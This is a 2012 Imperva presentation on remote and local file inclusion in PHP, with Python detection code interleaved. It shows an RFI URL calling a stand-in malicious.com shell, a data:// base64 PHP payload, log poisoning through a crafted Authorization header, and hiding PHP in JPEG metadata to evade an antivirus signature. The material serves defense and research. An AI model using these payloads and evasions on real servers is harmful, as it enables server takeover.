How to Prevent Remote & Local File Inclusion Attacks
Tal Be’ery Web Security Research Team Leader, Imperva
© 2012 Imperva, Inc. All rights reserved.
Tal Be’ery, CISSP
+ Web Security Research Team Leader at Imperva
+ Holds MSc & BSc degrees in CS/EE from TAU
+ 10+ years of experience in the IS domain
+ Facebook “white hat”
+ Speaker at RSA, BlackHat, AusCERT
Contents
+ PHP Background and Internals
+ RFI Insight
  + Analysis of a TimThumb shell “caught in the wild”
  + Advanced RFI using PHP streams and wrappers
+ LFI Insight
  + Innovative method for editing file content to embed PHP code and evade AV detection
  + Novel detection method
+ RFI and LFI in the Wild
  + New detection method using community-based reputation data
+ Questions and Answers
RFI, LFI - Under the Radar
+ PHP is everywhere
+ Exploiting PHP’s include vulnerabilities with RFI/LFI attacks leads to full server takeover
+ Hackers are actively attacking organizations
  + The TimThumb exploit reportedly compromised 1.2 million pages
+ And yet...
  + OWASP Top 10 in 2007 (#3)
  + Dropped from the list in 2010
Breadth and Depth of PHP
+ The most popular server-side programming language in the world!
Breadth and Depth of PHP
+ Popular Web applications are powered by PHP
PHP Internals - Parser HTML Mode
+ PHP’s parser starts in HTML mode
+ Everything before a PHP opening tag is treated as literal output: it is echoed, not parsed as code
  + typically “<?php”, but also “<?”
+ PHP code is now parsed and compiled
+ When the parser hits a closing tag (“?>”), it drops back to HTML mode
+ Allows “mixed” coding
PHP Internals - PHP Execution Steps
+ Parsing
  + Code is converted into tokens (lexing)
  + Tokens are processed into meaningful expressions (parsing)
+ Compiling
  + Derived expressions are converted into OpCodes
+ Execution
  + OpCodes are executed by the PHP engine
PHP Internals - Disassembling with the VLD Extension
+ Vulcan Logic Disassembler
  + PHP extension: http://pecl.php.net/package/vld
  + Maintainer: Derick Rethans (lead)
+ Dumps the OpCodes of compiled PHP scripts
+ Code is compiled but not executed
PHP Internals - VLD Analysis Demo
Compile
PHP Internals - include()
+ The include() statement includes and evaluates the specified file
+ Used to share code by reference
+ PHP version >= 4.3
  + Remote files (http://) are valid include targets
+ The parser drops to HTML mode at the beginning of the included file
And You Thought eval() Is Evil…
+ Meet eval()’s hungry sister: include()
+ Not only does she evaluate arbitrary code
+ She eats everything before the code
  + HTML mode: code can be prepended with anything (including binary content)
+ She loves dining out
  + Code can reside outside of the application
RFI Exploitation
+ Simple vulnerable app for warm-up
+ Exploit:
  + http://www.vulnerable.com/test.php?file=http://www.malicious.com/shell.txt
RFI in the Wild
Hacker Intel - Observations in the Wild
+ Hacker Intelligence Initiative (HII)
  + Initiated in 2010
  + Goes deep inside the cyber-underground and provides analysis of trending hacking techniques and attack campaigns in real time
  + Includes honeypots consisting of 40 Web applications
  + Analyzes security logs
RFI in the Wild - TimThumb
+ TimThumb
  + A WordPress extension to produce thumbnails of images
  + Vulnerable to RFI
  + 1.2 million exploited pages
TimThumb Exploit Analysis
+ Shell host: picasa.com.moveissantafe.com
  + Evaded the TimThumb filter that allowed inclusion only from a limited set of hosts
  + The implemented host check mistakenly allowed “picasa.com.moveissantafe.com” to pass as “picasa.com”
+ Started with a GIF file identifier, but then switched to encoded PHP
  + Evaded another TimThumb security filter used to verify that the file was indeed a valid picture
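The host-check bypass above is worth seeing side by side with a correct check. The following is an added example, not TimThumb's code or Imperva's: the buggy variant is an assumed reconstruction (a substring match of the allowed name against the URL, which reproduces the “picasa.com.moveissantafe.com” bypass the slide describes), and the allow-list entries are hypothetical. The fixed variant parses the URL, compares only the registered host name, and accepts exact matches or subdomains on a label boundary.

```python
from urllib.parse import urlsplit

# Hypothetical allow-list of external image hosts (illustrative, not TimThumb's list).
ALLOWED_HOSTS = ("picasa.com", "blogger.com", "flickr.com")


def host_check_buggy(url: str) -> bool:
    """Assumed reconstruction of a substring-style check: the allowed name only
    has to appear somewhere in the URL, so 'picasa.com.moveissantafe.com'
    (and 'evil.example/picasa.com/...') pass as 'picasa.com'."""
    lowered = url.lower()
    return any(allowed in lowered for allowed in ALLOWED_HOSTS)


def host_check_fixed(url: str) -> bool:
    """Parse the URL, take only the host name (userinfo and path are ignored),
    and accept it only if it equals an allowed name or is a subdomain of one.
    Anything that is not plain http(s), e.g. a data:// wrapper, is rejected."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    return any(host == a or host.endswith("." + a) for a in ALLOWED_HOSTS)


if __name__ == "__main__":
    for u in ("http://picasa.com.moveissantafe.com/shell.php",
              "http://lh3.picasa.com/photo.jpg",
              "http://picasa.com@evil.example/photo.jpg"):
        print(u, host_check_buggy(u), host_check_fixed(u))
```

The fixed check still trusts whatever the allowed host serves, so it is a containment measure, not a substitute for validating the fetched content (the slide's second bypass).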
TimThumb Exploit Analysis, Continued
+ Execution was controlled with additional HTTP parameters
  + LOL and OSC
Advanced RFI with PHP Streams
Advanced RFI with PHP Streams
+ Streams are a way of generalizing file, network, data compression, and other operations
+ Examples:
  + Accessing HTTP(S) URLs: http://, https://
  + Accessing FTP(S) URLs: ftp://, ftps://
  + Data (RFC 2397): data://
  + Accessing the local filesystem: file://
  + Accessing various I/O streams: php://
  + Compression streams: zlib://, bzip2://, zip:// (in PHP 4.3 and later the compression wrappers are named compress.zlib:// and compress.bzip2://)
RFI PHP Streams
+ Hacker’s objective
  + Run the following code on an RFI-vulnerable app: <?php phpinfo(); ?>
+ Degree of difficulty
  + No shell hosting is allowed
+ Means
  + Bare hands
RFI PHP Streams - Attack Example
+ base64(“<?php phpinfo()?>”) = "PD9waHAgcGhwaW5mbygpPz4="
+ Wrapped in the data wrapper:
  + "data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4="
RFI PHP Streams - Attack Example, Continued
Mission Accomplished!
PHP Streams - Why Hackers Use Them
+ To evade security filters
  + Many filters look only for exploits with the standard protocols
+ To hide the attack source
  + Shell URL obfuscation (compressed, base64)
+ To compromise without a hosted shell
  + Using the data wrapper
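The data:// attack example and the “filters look only for standard protocols” point above both come down to what a filter does with the include parameter. The following is an added example (not Imperva's detection logic, and not PHP) that classifies the value of an include()-controlled parameter: it recognises every wrapper scheme listed on the slides, not just http/ftp, URL-decodes first, and for data: URIs decodes the payload and checks it for a PHP opening tag. The parameter names and sample values are constructed; the base64 string is the one from the slide.

```python
import base64
import re
from urllib.parse import unquote

# Schemes a naive "remote URL" filter typically looks for ...
REMOTE_WRAPPERS = ("http", "https", "ftp", "ftps")
# ... and the rest of what include() will happily open when allow_url_include is on.
OTHER_WRAPPERS = ("data", "php", "file", "zip",
                  "compress.zlib", "compress.bzip2", "zlib", "bzip2")

# PHP opening tags the lexer honours (case-insensitive); short '<?' left out on purpose.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)
SCHEME = re.compile(r"^([a-z][a-z0-9.+-]*):", re.IGNORECASE)


def decode_data_uri(uri: str) -> bytes:
    """Decode an RFC 2397 data URI the way PHP's data wrapper does.
    Both 'data:' and 'data://' prefixes are accepted."""
    body = re.sub(r"^data:(//)?", "", uri, flags=re.IGNORECASE)
    meta, _, data = body.partition(",")
    if "base64" in meta.lower().split(";"):
        return base64.b64decode(data + "=" * (-len(data) % 4))
    return unquote(data).encode()


def classify_include_value(value: str) -> dict:
    """Classify one include()-parameter value from a request.
    naive_match  -> would a filter that only knows http/ftp see it?
    wrapper_abuse -> does it use one of the other PHP wrappers?
    For data: URIs the decoded payload is returned and checked for PHP."""
    value = unquote(value)  # attackers URL-encode; decode once before looking
    m = SCHEME.match(value)
    scheme = m.group(1).lower() if m else None
    result = {
        "scheme": scheme,
        "naive_match": scheme in REMOTE_WRAPPERS,
        "wrapper_abuse": scheme in OTHER_WRAPPERS,
        "payload": None,
        "has_php": False,
    }
    if scheme == "data":
        payload = decode_data_uri(value)
        result["payload"] = payload
        result["has_php"] = bool(PHP_TAG.search(payload))
    return result


if __name__ == "__main__":
    for v in ("http://www.malicious.com/shell.txt",                    # classic RFI
              "data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=",      # the slide's payload
              "php://input",                                            # code in the POST body
              "../../etc/passwd"):                                      # LFI, no scheme at all
        print(v, classify_include_value(v))
```

A value with no scheme is not necessarily harmless (it is the LFI case the next section covers); the point here is only that a filter keyed on “http://” sees nothing wrong with the data:// line even though it carries a complete PHP script.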
Local File Inclusion
LFI - Why Hackers Use It
+ LFI: the malicious code must be stored locally
+ Extra work, so why bother? Because RFI is disabled by default
  + Since PHP 5.2: allow_url_include = off (remote include stays off even where allow_url_fopen is on)
  + ~90% of PHP deployments run versions >= 5.2
LFI - How to Be Local
+ Abuse existing file-write functionality within the server: log files
+ Abuse file upload functionality to embed malicious code within the uploaded file
+ Let’s demo it…
LFI - Attacking Logs
+ Hacker’s objective
  + Run the following code: <?php phpinfo(); ?>
+ Degree of difficulty
  + allow_url_include = off, so the code must be local
+ Means
  + Proxy (or any other way to edit HTTP headers)
LFI - Attacking Logs Example
+ Authorization: Basic base64(user:pass)
+ = Authorization: Basic base64(<?php phpinfo()?>:123456)
+ = Authorization: Basic PD9waHAgcGhwaW5mbygpPz46MTIzNDU2
+ The web server decodes the header and writes the user-name field, PHP tags included, into its access log; the LFI then includes the log file
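Both halves of the log-poisoning attack above (crafting the header, and the fact that the server copies the decoded user name into a file PHP can later include) can be exercised offline. The following is an added example, not from the slides or from Imperva: it builds the slide's Authorization header, recovers the user name as a server would log it, and then runs a detector over constructed Apache combined-format log lines, flagging any client-controlled field that carries a PHP opening tag. It assumes Apache's `%u` field, which is written even when the request ends in 401 (the documentation marks it “may be bogus” in that case); the log lines and addresses are constructed, and the User-Agent line generalises the slide's header trick to another logged header.

```python
import base64
import re

# PHP opening tags the lexer honours (case-insensitive); short '<?' deliberately excluded.
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>.*?) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')

# Fields the client controls and the server copies verbatim into the log.
CLIENT_CONTROLLED = ("user", "request", "referer", "agent")


def poisoned_basic_auth_header(code: str, password: str = "123456") -> str:
    """The header from the slide: PHP code takes the place of the user name."""
    token = base64.b64encode(f"{code}:{password}".encode()).decode()
    return f"Authorization: Basic {token}"


def decode_basic_user(header_value: str) -> str:
    """Recover the user name a server would write to its access log (%u)."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic":
        return ""
    try:
        decoded = base64.b64decode(token, validate=True).decode("latin-1")
    except ValueError:
        return ""
    return decoded.partition(":")[0]


def find_log_poisoning(lines):
    """Detection side: (line_number, field) for every client-controlled log
    field carrying a PHP opening tag. Such a line turns the log into a
    ready-made payload the moment any LFI can reach the file."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if not m:
            continue
        for field in CLIENT_CONTROLLED:
            if PHP_TAG.search(m.group(field)):
                hits.append((n, field))
    return hits


# Constructed sample log (not real traffic). Line 2: the Authorization trick;
# line 3: the follow-up LFI pulling the log in; line 4: same idea via User-Agent.
SAMPLE_LOG = [
    '203.0.113.5 - - [08/May/2012:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - <?php phpinfo()?> [08/May/2012:10:00:02 +0000] "GET /admin/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [08/May/2012:10:00:03 +0000] "GET /test.php?file=../../../../var/log/apache2/access.log HTTP/1.1" 200 9041 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/May/2012:10:00:04 +0000] "GET / HTTP/1.1" 200 100 "-" "<?PHP phpinfo(); ?>"',
]

if __name__ == "__main__":
    print(poisoned_basic_auth_header("<?php phpinfo()?>"))
    print(find_log_poisoning(SAMPLE_LOG))
```

Line 3 is not flagged by this detector (it contains no PHP tag); correlating a poisoned line with a later traversal request against a log path is the natural next rule, and the reason logs should live outside any directory an include() can be steered to.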
LFI - Attacking Logs Example, Continued
Mission Accomplished!
LFI - Abusing Upload
+ Hacker’s objective
  + Upload a picture with known malicious code to create LFI
+ Degree of difficulty
  + Picture appearance must not change
  + AV must not detect the code
+ Means
  + Bare hands
LFI – Abusing Upload Example: Initial PHP Code
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
+ Prints FeeLCoMz twice
+ Found in the wild
+ Detected by AVs
LFI – Abusing Upload Example: Embedding Code in Picture, Phase I
+ Picture: JPG format
+ Editing EXIF properties
Better… But not good enough!
LFI – Abusing Upload Example: Embedding Code in Picture, Phase II
+ Let’s split the vector across two adjacent properties
Better… But not good enough!
LFI – Abusing Upload Example: Embedding Code in Picture, Phase III
+ Now it gets personal: ClamAV signature PHP.Hide-1
  PHP.Hide-1:0:0:ffd8ffe0?0104a464946{-4000}3c3f706870(0d|20|0a)
+ 3c3f706870 is hex for <?php. Maybe changing the case will work…
LFI – Abusing Upload Example, Recap
+ Hacker’s objective
  + Upload a picture with known malicious code to create LFI
+ Degree of difficulty
  + Picture appearance must not change
  + AV must not detect the code
Mission Accomplished!
LFI – Abusing Upload - Why AV Fails
+ General-purpose AVs search only for malicious code
  + In the context of LFI exploit detection we are OK with detecting files containing any PHP code
+ General-purpose AVs are built to find compiled malicious code
  + Finding malicious source code requires a different set of features and awareness of text-related evasions
LFI - Abusive File Upload Misdetection
+ Anti-virus: we just witnessed how it fails at this task
+ Degenerate PHP parser: looks only for PHP begin/end tokens
  + Looks for short tags (<\?.*\?>): many false positives
+ Compile the uploaded file and check if it compiles
  + Even benign documents are (trivially) compiled
+ Run the file and see if it executes… hmm
LFI - Abusive Upload File Detection
+ VLD it!
  + Compile the file with VLD
  + Inspect the OpCodes
  + No execution
+ A file bearing no PHP code yields only two OpCodes
  + ECHO: to print the non-PHP content
  + RETURN: to return after the “execution”
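The Phase III evasion (changing the case of `<?php` to slip past a case-sensitive ClamAV signature) and the “degenerate PHP parser” alternative discussed above can be reproduced without an AV engine. The following is an added example, not the slides' or Imperva's code, and not the VLD method the page recommends: it translates the quoted PHP.Hide-1 signature into a byte regex, builds a constructed minimal JFIF file whose COM segment stands in for the edited EXIF properties, and compares three verdicts: a magic-bytes check of the kind upload handlers rely on, the signature, and a case-insensitive scan for PHP opening tags that matches the way PHP's lexer does. The JPEG bytes and payloads are constructed for the example.

```python
import re
import struct

# ClamAV PHP.Hide-1 body, as quoted on the slide, as a regex over the raw bytes:
#   ffd8ffe0    JPEG SOI + APP0 marker
#   ?0 10       APP0 length 0x?010 ('?' is a nibble wildcard)
#   4a464946    "JFIF"
#   {-4000}     at most 4000 arbitrary bytes
#   3c3f706870  "<?php", lower case only
#   (0d|20|0a)  CR, space or LF
CLAMAV_PHP_HIDE_1 = re.compile(
    rb"\xff\xd8\xff\xe0"
    rb"[\x00\x10\x20\x30\x40\x50\x60\x70\x80\x90\xa0\xb0\xc0\xd0\xe0\xf0]\x10"
    rb"JFIF.{0,4000}<\?php[\r \n]",
    re.DOTALL,
)

# "Degenerate PHP parser": opening tags matched the way the PHP lexer matches them,
# i.e. case-insensitively. Short '<?' tags are left out to avoid the false positives
# the page mentions; add them if the target runs with short_open_tag=On.
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)


def jpeg_with_comment(comment: bytes) -> bytes:
    """Constructed minimal JFIF file (not a real picture) whose COM segment
    carries `comment`, standing in for the edited EXIF properties."""
    app0_payload = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    app0 = b"\xff\xe0" + struct.pack(">H", len(app0_payload) + 2) + app0_payload
    com = b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return b"\xff\xd8" + app0 + com + b"\xff\xd9"


def magic_says_jpeg(data: bytes) -> bool:
    """The check an upload handler typically relies on: header bytes only."""
    return data[:3] == b"\xff\xd8\xff"


def clamav_flags(data: bytes) -> bool:
    return bool(CLAMAV_PHP_HIDE_1.search(data))


def contains_php(data: bytes) -> bool:
    """Scan the whole byte stream, as PHP's lexer will when include() reaches it."""
    return bool(PHP_OPEN_TAG.search(data))


def scan_upload(data: bytes) -> dict:
    """All three verdicts for one uploaded file."""
    return {
        "magic_says_jpeg": magic_says_jpeg(data),
        "clamav_php_hide_1": clamav_flags(data),
        "contains_php": contains_php(data),
    }


if __name__ == "__main__":
    for label, payload in (("lower", b"<?php phpinfo(); ?>"),
                           ("upper", b"<?PHP phpinfo(); ?>"),
                           ("benign", b"holiday snap")):
        print(label, scan_upload(jpeg_with_comment(payload)))
```

Because the scan runs over the raw bytes rather than over parsed metadata fields, the Phase II trick of splitting the tag across two adjacent properties does not help the attacker either, as long as the two halves end up contiguous in the file, which is exactly the condition under which PHP would execute them.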
LFI - Abusive File Detection with VLD Demo
RFI, LFI in the Wild
RFI, LFI in the Wild
+ Very relevant
  + 20% of all Web application attacks
+ LFI is more prevalent than RFI
  + 90% of PHP deployments are of versions that do not allow RFI by default
RFI in the Wild - Sources Analysis
+ Highly automated
+ Consistent attackers
RFI in the Wild - Sources Analysis
+ Many sources attack more than one target
RFI in the Wild - Shell Hosting URLs Analysis
Obtaining shell hosting URLs:
1. Analyze the honeypot’s RFI security log entry
   http://www.vulnerable.com/test.php?file=http://www.malicious.com/shell.txt
2. Download the shell: wget http://www.malicious.com/shell.txt
3. Verify it’s a script, to refrain from false positives
RFI in the Wild - Shell Hosting URLs Analysis
+ Some URLs are being used consistently
RFI in the Wild - Shell Hosting URLs Analysis
+ Many shell URLs are used against more than one target
A New Approach - Community-Based RFI Black Lists
+ Attack characteristics (source, shell URL)
  + Non-transient: stable for days
  + General: not confined to a single honeypot
+ By forming a community that shares RFI data we can create black lists of
  + Attack sources
  + Attackers’ shell hosting URLs
+ Achieve better protection!
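The three-step shell-URL procedure above and the community black-list idea it feeds can be sketched end to end. The following is an added example, not Imperva's HII pipeline: it extracts shell URLs from honeypot log entries (step 1), keeps a URL only if the fetched body looks like PHP (step 3; the download itself, wget on the slide, is left out so the example runs offline), and then aggregates sources and URLs across honeypots, listing those that are “general” (seen against at least two targets) or “non-transient” (in use for at least a day). The honeypot identifiers, timestamps, addresses and URIs are constructed, patterned on the slide's example URL.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

REMOTE_URL = re.compile(r"^(?:https?|ftps?)://", re.IGNORECASE)
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)

# Constructed honeypot RFI log entries (not real data):
# (honeypot id, timestamp, source IP, requested URI)
EVENTS = [
    ("hp01", "2012-05-01T03:12:00", "198.51.100.23", "/test.php?file=http://www.malicious.com/shell.txt"),
    ("hp02", "2012-05-01T03:14:00", "198.51.100.23", "/index.php?page=http://www.malicious.com/shell.txt?"),
    ("hp07", "2012-05-03T11:40:00", "203.0.113.77", "/test.php?file=http://www.malicious.com/shell.txt%00"),
    ("hp03", "2012-05-02T08:00:00", "203.0.113.8", "/test.php?file=http://one-off.example/x.txt"),
    ("hp03", "2012-05-02T08:01:00", "203.0.113.8", "/test.php?file=../../../../etc/passwd"),
]


def extract_shell_urls(request_uri: str) -> list:
    """Step 1: pull the remote URL(s) out of an RFI log entry. Any query
    parameter whose value is a URL counts. Trailing '?' and NUL suffixes,
    appended by attackers to neutralise the application's own file suffix,
    are stripped so variants of one shell collapse into one entry."""
    qs = parse_qs(urlsplit(request_uri).query, keep_blank_values=True)
    urls = []
    for values in qs.values():
        for v in values:
            v = v.rstrip("?\x00")
            if REMOTE_URL.match(v):
                urls.append(v)
    return urls


def looks_like_php_script(body: bytes) -> bool:
    """Step 3: keep a fetched URL only if the body really is PHP, so benign
    URLs that merely appear in attack traffic are not black-listed."""
    return bool(PHP_OPEN_TAG.search(body))


def build_blacklists(events, min_targets=2, min_span=timedelta(days=1)) -> dict:
    """Community view across honeypots. A source IP or shell URL is listed when
    it hit at least `min_targets` distinct honeypots ('general') or stayed in
    use for at least `min_span` ('non-transient')."""
    src_targets, src_times = defaultdict(set), defaultdict(list)
    url_targets, url_times = defaultdict(set), defaultdict(list)
    for hp, ts, src, uri in events:
        urls = extract_shell_urls(uri)
        if not urls:
            continue  # e.g. a traversal-style LFI attempt, not RFI
        t = datetime.fromisoformat(ts)
        src_targets[src].add(hp)
        src_times[src].append(t)
        for u in urls:
            url_targets[u].add(hp)
            url_times[u].append(t)

    def qualifies(targets, times):
        return len(targets) >= min_targets or max(times) - min(times) >= min_span

    return {
        "sources": sorted(s for s in src_targets if qualifies(src_targets[s], src_times[s])),
        "shell_urls": sorted(u for u in url_targets if qualifies(url_targets[u], url_times[u])),
    }


if __name__ == "__main__":
    print(build_blacklists(EVENTS))
```

The single-honeypot, single-day entries (the one-off URL and its source) are deliberately left off the list; that is the false-positive control the community view buys, since a lone honeypot cannot tell a persistent campaign from one noisy request.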
Additional Resources
Hacker Intelligence Initiative
+ Subscribe to Imperva’s Hacker Intelligence Initiative (HII):
  + Sign up to stay informed on all the latest attacks and hacking techniques
+ Download HII RFI resources:
  + Report: Remote File Inclusion (RFI) Vulnerabilities 101
  + Infographic: Exploiting RFI Attacks 101
Join Imperva’s LinkedIn Group Data Security Direct for…
+ Presentation materials
+ Post-presentation discussions
+ Answers to attendee questions
+ Link to presentation audio
+ Link to presentation slides
http://www.linkedin.com/groups/Imperva-Data-Security-Direct-3849609
www.imperva.com
- CONFIDENTIAL -